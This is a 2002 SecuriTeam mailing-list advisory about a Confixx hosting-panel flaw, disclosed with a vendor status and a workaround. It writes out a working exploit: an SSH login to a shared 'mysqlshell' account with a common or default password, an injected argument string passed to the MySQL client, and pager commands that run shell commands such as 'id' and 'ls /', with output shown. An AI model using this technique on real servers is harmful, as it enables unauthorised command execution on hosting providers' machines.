[UNIX] Confixx Vulnerability Allows Attacker Remote Control of the SQL Server

From: support@securiteam.com
Date: 07/26/02


From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 26 Jul 2002 15:42:21 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Confixx Vulnerability Allows Attacker Remote Control of the SQL Server
------------------------------------------------------------------------

SUMMARY

 <http://www.yippi-yeah.com/de/p_confixx.php> Confixx is a comfortable
tool to automate customer administration on Linux-based web servers with
graphical interfaces for Administrators, Resellers, and End Users. A
security vulnerability in the product allows attackers to execute
arbitrary commands on the server practically allowing him to remotely
control the server.

DETAILS

A security vulnerability in Confixx allows attackers to execute commands
on many confixx-boxes nearly without the need to get a valid account. All
you would need to know is:
 - Whether the web hosting provider is running Confixx
 - The password of the "mysqlshell-user"
 - Access to the MySQL server

Since the password of the "mysqlshell-user" is the same for all customers,
gaining access to it is trivial. The "mysqlshell-user" is shell limited,
however, using the below technique elevated access can be reached.

NOTE: Some providers neglect to set a hard to guess password leaving it
set to 123456.

With this account and password, you can do the following:

---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user

Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------

Here you have to enter the following string:
 -e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1

After that you will be prompted for a password, enter your PASSWORD (from
the user "-e" on your MySQL server).

---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
..
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
..

Vendor status:
A customer, who uses confixx, informed the vendor about 20 months ago.
Resulting in Confixx adding the following line: export
EDITOR="/bin/false";. Therefore an attacker cannot use "edit;" at the
MySQL prompt and get through it an interactive shell.

However, you still can login to the MySQL server and still execute
commands.

Workaround:
Delete the "mysqlshell-user".

ADDITIONAL INFORMATION

The information has been provided by <mailto:rd@mesos.de> Ralf Dreibrodt.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.